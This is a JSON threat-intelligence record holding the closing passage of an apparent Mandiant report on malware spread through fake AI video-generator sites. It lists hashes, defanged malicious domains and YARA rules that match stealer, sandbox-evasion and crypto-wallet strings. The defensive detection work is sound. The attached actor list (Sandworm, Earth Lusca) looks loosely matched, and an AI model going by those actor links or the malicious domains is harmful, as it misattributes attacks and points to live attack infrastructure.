Ervin Ocampo, Swapnil Patil, Muhammad Umer Khan, and Muhammad Hasib Latif for providing the detection opportunities.\r\nDetection Opportunities\r\nThe following indicators of compromise (IOCs) and YARA rules are also available as a collection and rule pack in Google Threat Intelligence (GTI).\r\nHost-Based IOCs\r\nFile  SHA256  Notes\r\nLumalabs_1926326251082123689-626.zip  8863065544df546920ce6189dd3f99ab3f5d644d3d9c440667c1476174ba862b  Downloaded ZIP archive\r\nLumalabs_1926326251082123689-626.mp4⠀.exe  d3f50dc61d8c2be665a2d3933e2668448edc31546fea84517f8e61237c6d2e5d  STARKVEIL\r\nC:\\winsystem\\heif\\heif.dll  839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b  Launcher\r\n%APPDATA%\\Launcher\\libde265.dll  4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959  Persistence\r\n%APPDATA%\\python\\avcodec-61.dll  8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc  GRIMPULL\r\n%APPDATA%\\pythonw\\heif.dll  a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3  XWORM\r\nC:\\winsystem\\heif-info\\heif.dll  1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb  XWORM\r\n%APPDATA%\\ffplay\\libde265.dll  dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3  FROSTRIFT\r\nC:\\winsystem\\heif2rgb\\heif.dll  e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822  FROSTRIFT\r\nNetwork-Based IOCs\r\nMalware Command and Control\r\nDomain\r\nstrokes.zapto[.]org:7789\r\nartisanaqua[.]ddnsking[.]com:25699\r\nstrokes.zapto[.]org:56001\r\nFake AI Domains\r\nDomain  Registration Date\r\ncreativepro[.]ai  2024-07-10\r\nboostcreatives[.]ai  2024-07-12\r\ncreativepro-ai[.]com  2024-08-02\r\nboostcreatives-ai[.]com  2024-08-04\r\ncreativespro-ai[.]com  2024-08-07\r\nklingxai[.]com  2024-09-19\r\nlumaai-labs[.]com  2024-09-29\r\nklings-ai[.]com  2024-10-17\r\nluma-dream[.]com  2024-10-26\r\nquirkquestai[.]com  2024-11-02\r\nlumaai-dream[.]com  2024-11-06\r\nlumaai-lab[.]com  2024-11-08\r\nlumaaidream[.]com  2024-11-09\r\nlumaailabs[.]com  2024-11-10\r\nluma-dreamai[.]com  2024-11-12\r\nai-kling[.]com  2024-11-22\r\ndreamai-luma[.]com  2024-12-13\r\naikling[.]ai  2025-01-04\r\naisoraplus[.]com  2025-01-07\r\nlumalabsai[.]in  2025-01-16\r\ncanvadream-lab[.]com  2025-01-20\r\ncanvadreamlab[.]com  2025-01-25\r\nadobe-express[.]com  2025-02-08\r\ncanva-dreamlab[.]com  2025-02-12\r\ncanvadreamlab[.]ai  2025-02-14\r\ncanvaproai[.]com  2025-02-17\r\ncapcutproai[.]com  2025-02-22\r\nluma-aidream[.]com  2025-02-27\r\nluma-dreammachine[.]com  2025-03-07\r\nYARA Rules\r\nrule G_Dropper_COILHATCH_1 {\r\n  meta:\r\n    author = \"Mandiant\"\r\n  strings:\r\n    $i1 = \"zlib.decompress\" ascii wide\r\n    $i2 = \"rc4\" ascii wide\r\n    $i3 = \"aes_decrypt\" ascii wide\r\n    $i4 = \"xor\" ascii wide\r\n    $i5 = \"rsa_decrypt\" ascii wide\r\n    $r1 = \"private_key\" ascii wide\r\n    $r2 = \"runner\" ascii wide\r\n    $r3 = \"marshal\" ascii wide\r\n    $r4 = \"marshal.loads\" ascii wide\r\n    $r5 = \"b85decode\" ascii wide\r\n    $r6 = \"exceute_func\" ascii wide\r\n    $r7 = \"hybrid_decrypt\" ascii wide\r\n  condition:\r\n    (4 of ($i*)) and all of ($r*)\r\n}\r\nrule G_Dropper_STARKVEIL_1 {\r\n  meta:\r\n    author = \"Mandiant\"\r\n  strings:\r\n    $p00_0 = { 56 57 53 48 83 EC ?? 48 8D AA [4] 48 8B 7D ?? 48 8B 4F ?? FF 15 [4] 48 89 F9 }\r\n    $p00_1 = { 0F 0B 66 0F 1F 84 00 [4] 48 89 54 24 ?? 55 41 56 56 57 53 48 83 EC }\r\n  condition:\r\n    uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and (($p00_0 in (48000 .. 59000) and $p00_1 in (100000 .. 
120000)))\r\n}\r\nimport \"dotnet\"\r\nrule G_Downloader_GRIMPULL_1 {\r\n  meta:\r\n    author = \"Mandiant\"\r\n  strings:\r\n    $str1 = \"SbieDll.dll\" ascii wide\r\n    $str2 = \"cuckoomon.dll\" ascii wide\r\n    $str3 = \"vmGuestLib.dll\" ascii wide\r\n    $str4 = \"select * from Win32_BIOS\" ascii wide\r\n    $str5 = \"VMware|VIRTUAL|A M I|Xen\" ascii wide\r\n    $str6 = \"Microsoft|VMWare|Virtual\" ascii wide\r\n    $str7 = \"win32_process.handle='{0}'\" ascii wide\r\n    $str8 = \"stealer\" ascii wide\r\n    $code = { 11 20 11 0F 11 20 11 0F 91 11 1A 11 0F 91 61 D2 9C }\r\n  condition:\r\n    dotnet.is_dotnet and all of them\r\n}\r\nrule G_Backdoor_FROSTRIFT_1 {\r\n  meta:\r\n    author = \"Mandiant\"\r\n  strings:\r\n    $guid = \"$23e83ead-ecb2-418f-9450-813fb7da66b8\"\r\n    $r1 = \"IdentifiableDecryptor.DecryptorStack\"\r\n    $r2 = \"$ProtoBuf.Explorers.ExplorerDecryptor\"\r\n    $s1 = \"\\\\User Data\\\\\" wide\r\n    $s2 = \"SELECT * FROM AntiVirusProduct\" wide\r\n    $s3 = \"Telegram.exe\" wide\r\n    $s4 = \"SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" wide\r\n    $s5 = \"Litecoin-Qt\" wide\r\n    $s6 = \"Bitcoin-Qt\" wide\r\n  condition:\r\n    uint16(0) == 0x5a4d and (all of ($s*) or $guid or all of ($r*))\r\n}\r\nYARA-L Rules\r\nMandiant has made the relevant rules available in the Google SecOps Mandiant Intel Emerging Threats curated detections rule set. 
The activity discussed in the blog post is detected under the rule names:\r\nSuspicious Binary File Execution - MP4 Masquerade\r\nSuspicious Binary File Execution - Double Extension and Braille Pattern Blank Masquerade\r\nPython Script Deobfuscation - Base85 ZLib Marshal\r\nSuspicious Staging Directory WinSystem\r\nDLL Search Order Hijacking AVCodec61\r\nDLL Search Order Hijacking HEIF\r\nDLL Search Order Hijacking Libde265\r\nPosted in Threat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/cybercriminals-weaponize-fake-ai-websites"
	],
	"report_names": [
		"cybercriminals-weaponize-fake-ai-websites"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1081082f-c780-4f3f-8090-0952b4455230",
			"created_at": "2022-10-25T16:07:24.297942Z",
			"updated_at": "2026-04-10T02:00:04.92646Z",
			"deleted_at": null,
			"main_name": "TAG-38",
			"aliases": [],
			"source_name": "ETDA:TAG-38",
			"tools": [
				"FRP",
				"Fast Reverse Proxy",
				"POISONPLUG.SHADOW",
				"ShadowPad Winnti",
				"XShellGhost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "66096816-7d20-483e-9683-33f2ed33f8ed",
			"created_at": "2026-01-20T02:00:03.65226Z",
			"updated_at": "2026-04-10T02:00:03.909091Z",
			"deleted_at": null,
			"main_name": "UNC6032",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC6032",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434648,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7f70590d2c14a86dbe7cc3a31817710972e8179b.pdf",
		"text": "https://archive.orkl.eu/7f70590d2c14a86dbe7cc3a31817710972e8179b.txt",
		"img": "https://archive.orkl.eu/7f70590d2c14a86dbe7cc3a31817710972e8179b.jpg"
	}
}